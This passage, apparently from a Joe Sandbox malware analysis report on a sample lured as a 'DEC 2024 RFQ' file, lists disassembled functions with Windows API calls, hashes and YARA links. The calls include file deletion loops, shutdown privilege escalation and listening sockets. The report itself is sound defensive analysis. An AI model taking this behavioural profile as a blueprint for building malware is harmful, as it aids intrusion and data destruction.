                                                                                                                      • Instruction Fuzzy Hash: CA219135600A119FEB14AF64EC59F7D7BA8FF05711F14802AF9469B2B2DB38AC01DB54
                                                                                                                      Function 000837EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00024750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00024743,?,?,000237AE,?), ref: 00024770
                                                                                                                        • Part of subcall function 00084A31: GetFileAttributesW.KERNEL32(?,0008370B), ref: 00084A32
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000838A3
                                                                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0008394B
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0008395E
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0008397B
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0008399D
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 000839B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 4002782344-1173974218
                                                                                                                      • Opcode ID: f23fcfbe0399724406e3e190d3ad3b36d645185d4146edbaa9791b3f4110ee48
                                                                                                                      • Instruction ID: 2b19afccc00220d7617ffb42162cb44e8d0f455e98dff7a859f648cbfebbf1be
                                                                                                                      • Opcode Fuzzy Hash: f23fcfbe0399724406e3e190d3ad3b36d645185d4146edbaa9791b3f4110ee48
                                                                                                                      • Instruction Fuzzy Hash: 9A51AF3180515DAACF15FFA0E9929FDB7B8AF51300F600069E486B7192EF316F09CB61
                                                                                                                      Function 0008F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0008F440
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0008F470
                                                                                                                      • _wcscmp.LIBCMT ref: 0008F484
                                                                                                                      • _wcscmp.LIBCMT ref: 0008F49F
                                                                                                                      • FindNextFileW.KERNEL32(?,?), ref: 0008F53D
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0008F553
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 713712311-438819550
                                                                                                                      • Opcode ID: d65c3a8b889968edca4be7a7f09dede63570b236ab15e464776851c23780ba92
                                                                                                                      • Instruction ID: 0bb525a43c24fa05ff5704dc2c3cdc399f4fd029a06af825bd28214b63c499bf
                                                                                                                      • Opcode Fuzzy Hash: d65c3a8b889968edca4be7a7f09dede63570b236ab15e464776851c23780ba92
                                                                                                                      • Instruction Fuzzy Hash: 77417C7190021AAFCF54EFB4DC45AFEBBB4FF05310F14456AE959A6291DB309A84CBA0
                                                                                                                      Function 00035760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 07d0eacba4d1f4a24e81a812396f7af21b8c40e0d67a30cb4a0dbc2b5a3e1d52
                                                                                                                      • Instruction ID: 0f5bf13ac72f0a103cf6fc437edd6d0b74490f5fb6ea8fe3f2cb2d7566b9ab3c
                                                                                                                      • Opcode Fuzzy Hash: 07d0eacba4d1f4a24e81a812396f7af21b8c40e0d67a30cb4a0dbc2b5a3e1d52
                                                                                                                      • Instruction Fuzzy Hash: D012AE70E00609DFDF14DFA5D985AEEB3F9FF48301F108629E809A7261EB39A910CB55
                                                                                                                      Function 00083B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00024750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00024743,?,?,000237AE,?), ref: 00024770
                                                                                                                        • Part of subcall function 00084A31: GetFileAttributesW.KERNEL32(?,0008370B), ref: 00084A32
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00083B89
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00083BD9
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00083BEA
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00083C01
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00083C0A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                                      • Opcode ID: f90a46c22bd02102756c4bd0b79db7a93b813f77bcaaa4da8d3937a1f7230fab
                                                                                                                      • Instruction ID: 6b1cca3327b6a0ae0ee662a7108395c3e952a73cc545e0ea125669f6efc117b3
                                                                                                                      • Opcode Fuzzy Hash: f90a46c22bd02102756c4bd0b79db7a93b813f77bcaaa4da8d3937a1f7230fab
                                                                                                                      • Instruction Fuzzy Hash: 21316D310087959BC305FF64D8959EFB7E8BF92314F404E2DF4D592192EB259A08C767
                                                                                                                      Function 000851BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0007882B
                                                                                                                        • Part of subcall function 000787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00078858
                                                                                                                        • Part of subcall function 000787E1: GetLastError.KERNEL32 ref: 00078865
                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 000851F9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                      • String ID: $@$SeShutdownPrivilege
                                                                                                                      • API String ID: 2234035333-194228
                                                                                                                      • Opcode ID: 734ad4b05e36cf20aa57f1c64a10b32c81c4ad4a8254f181d179a876b8b67acf
                                                                                                                      • Instruction ID: c12fcd93cdeefa091d890c6425ce721144e266ae14c2c3d5d8e69ee198692167
                                                                                                                      • Opcode Fuzzy Hash: 734ad4b05e36cf20aa57f1c64a10b32c81c4ad4a8254f181d179a876b8b67acf
                                                                                                                      • Instruction Fuzzy Hash: 6A01F731A95A126BFB7872689C8AFFA7298BB07742F204421F9D7E21D2DD555C0087A0
                                                                                                                      Function 00096283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000962DC
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 000962EB
                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00096307
                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00096316
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00096330
                                                                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00096344
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279440585-0
                                                                                                                      • Opcode ID: 1b63259f8bfb6835895d76949502226d9d2c9058d8aae263f294eb605dfd9ff5
                                                                                                                      • Instruction ID: f2d473e2b36b7543e79bcfa7639eeee186d3670adb37824f4d125c79c52d0ece
                                                                                                                      • Opcode Fuzzy Hash: 1b63259f8bfb6835895d76949502226d9d2c9058d8aae263f294eb605dfd9ff5
                                                                                                                      • Instruction Fuzzy Hash: 3821FD31600610AFDF10EFA4D885ABEB7E8EF49720F148169F816A73A2CB34AD01DB51
                                                                                                                      Function 00035520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00040DB6: std::exception::exception.LIBCMT ref: 00040DEC
                                                                                                                        • Part of subcall function 00040DB6: __CxxThrowException@8.LIBCMT ref: 00040E01
                                                                                                                      • _memmove.LIBCMT ref: 00070258
                                                                                                                      • _memmove.LIBCMT ref: 0007036D
                                                                                                                      • _memmove.LIBCMT ref: 00070414
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1300846289-0
                                                                                                                      • Opcode ID: 16c0ace241a237a9d9898c25859ff1f7285f174479234faff275721955e13601
                                                                                                                      • Instruction ID: 45cfb8992f06cf39b49a7f1a236c4f9e03e86705811e91d4c6f8c406ea4977db
                                                                                                                      • Opcode Fuzzy Hash: 16c0ace241a237a9d9898c25859ff1f7285f174479234faff275721955e13601
                                                                                                                      • Instruction Fuzzy Hash: 6302B2B0E00209DBDF05DF64D981AAE7BF9EF44300F54C069E80AEB256EB35DA54CB95
                                                                                                                      Function 00021287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 000219FA
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00021A4E
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00021A61
                                                                                                                        • Part of subcall function 00021290: DefDlgProcW.USER32(?,00000020,?), ref: 000212D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ColorProc$LongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3744519093-0
                                                                                                                      • Opcode ID: 46da2e4ff7efc377923764bcb1ebb98a48f9a680ccce9558bfda483595340995
                                                                                                                      • Instruction ID: 7257df4e0494f3c8db72ae3075617e49358dca5c5ebfe7ec00a86ea8a8d871a5
                                                                                                                      • Opcode Fuzzy Hash: 46da2e4ff7efc377923764bcb1ebb98a48f9a680ccce9558bfda483595340995
                                                                                                                      • Instruction Fuzzy Hash: 57A17A711069A4BEE678AB28BC49EFF35DCDF66346B14011AF902D5193CF26AD01D2B3
                                                                                                                      Function 0008BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0008BCE6
                                                                                                                      • _wcscmp.LIBCMT ref: 0008BD16
                                                                                                                      • _wcscmp.LIBCMT ref: 0008BD2B
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0008BD3C
                                                                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0008BD6C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2387731787-0
                                                                                                                      • Opcode ID: 6a02abe7c10c6a39f93d42e144f82f04f73b41ae9f80db9ac2b055207f2c0d45
                                                                                                                      • Instruction ID: c99c601d5a7d00e22320d9827eefeefc6d22b4ebc39321b03c9231c0880ada1c
                                                                                                                      • Opcode Fuzzy Hash: 6a02abe7c10c6a39f93d42e144f82f04f73b41ae9f80db9ac2b055207f2c0d45
                                                                                                                      • Instruction Fuzzy Hash: 9F518075604702AFD714EF68D490EAAB7E4FF49320F14461DE996873A2DB30ED04CB91
                                                                                                                      Function 00096747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00097D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00097DB6
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0009679E
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 000967C7
                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00096800
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0009680D
                                                                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00096821
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 99427753-0
                                                                                                                      • Opcode ID: d023fa1ecd2293157047bf9ec72d4ec7bcc48c1409567f427c2293b000a96079
                                                                                                                      • Instruction ID: 94628961fd1c47382d30c9c30a21fb341ca0def16d1c90b85ba0b4c207935507
                                                                                                                      • Opcode Fuzzy Hash: d023fa1ecd2293157047bf9ec72d4ec7bcc48c1409567f427c2293b000a96079
                                                                                                                      • Instruction Fuzzy Hash: 6141D375A00620AFEB10AF649C86FBE77E8EF05714F448458F91AAB3C3CE749D008791
                                                                                                                      Function 000A5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 292994002-0
                                                                                                                      • Opcode ID: dc32d44c89b09743c67a4f643018e4e34b6bfdbae32d38db8ba5e1921d4f45a4
                                                                                                                      • Instruction ID: 2b501e8f756719b1b21da0836ba5dfbf399276524868250c342b2f569149047c
                                                                                                                      • Opcode Fuzzy Hash: dc32d44c89b09743c67a4f643018e4e34b6bfdbae32d38db8ba5e1921d4f45a4
                                                                                                                      • Instruction Fuzzy Hash: FD11E732700D226FEB215FA6DC44A6E7BD8FF867A2B444439F946D7242CB74DD01C6A4
                                                                                                                      Function 000780A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000780C0
                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000780CA
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000780D9
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000780E0
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000780F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 44706859-0
                                                                                                                      • Opcode ID: ebbf5fa743ef212972cde5b95ecd14def45c38778a82ea125df61f5134e344e5
                                                                                                                      • Instruction ID: fb8e7c6b0ec783d0d6567596a800b011d01160572130fc20de34e6582858d3a0
                                                                                                                      • Opcode Fuzzy Hash: ebbf5fa743ef212972cde5b95ecd14def45c38778a82ea125df61f5134e344e5
                                                                                                                      • Instruction Fuzzy Hash: 19F06231240605AFEB501FA5EC8DE773BACEF4A755B408025F949C6150CB699D41DB60
                                                                                                                      Function 0008C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0008C432
                                                                                                                      • CoCreateInstance.OLE32(000B2D6C,00000000,00000001,000B2BDC,?), ref: 0008C44A
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                      • CoUninitialize.OLE32 ref: 0008C6B7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2683427295-24824748
                                                                                                                      • Opcode ID: b6152db4b2b1317d92b9cab5610d21835b98e0bdcda0dbdf77dafe275001e754
                                                                                                                      • Instruction ID: 4813ded817d9df2a28d1e712052eaf1dedc4b70880f17200b6a6dad56a2ecf32
                                                                                                                      • Opcode Fuzzy Hash: b6152db4b2b1317d92b9cab5610d21835b98e0bdcda0dbdf77dafe275001e754
                                                                                                                      • Instruction Fuzzy Hash: 1DA15B71104205AFD700EF54D881EAFB7E8FF85354F00492DF5999B1A2EB71EA49CB62
                                                                                                                      Function 00024B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00024AD0), ref: 00024B45
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00024B57
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
